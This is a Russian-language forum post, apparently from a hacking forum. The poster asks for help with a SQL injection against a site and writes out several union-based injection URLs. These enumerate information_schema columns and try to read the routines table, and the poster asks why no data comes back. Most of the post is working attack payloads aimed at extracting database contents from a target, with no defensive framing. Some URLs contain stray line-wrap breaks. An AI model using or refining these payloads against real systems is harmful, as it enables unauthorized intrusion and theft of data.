Всем привет!
Разъясните...
Есть скуля - information_schema - доступно.
далее:
http://site.com/non.php?id=-6+union+select+1,2,concat(table_name,0x3a,column_n ame)4,5,6,7,8+from+information_schema.columns--
вываливаются куча всего и там я выцепляю routines:sql_admin
далее:
http://site.com/non.php?id=-6+union+select+1,2,sql.admin,4,5,6,7,8+from+routin es--
ошибка:
Table 'db.routines' doesn't exist
ага, значит все в другой базе.
далее смотрю в какой именно базе:
http://site.com/non.php?id=-6+union+select+1,table_schema,3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'--
отображается "information_schema"
подставляю:
http://site.com/non.php?id=-6+union+select+1,2,sql_admin,4,5,6,7,8+from+inform ation_schema.routines--
Страница без ошибок обновляется, но ни какой инфы нет.
Тут меня терзают сомнения:
1. Корректно ли я указал "information_schema.routines"
2. Может быть у меня не хватает прав?
3. Или где-то накосячил изначально?
Спасибо!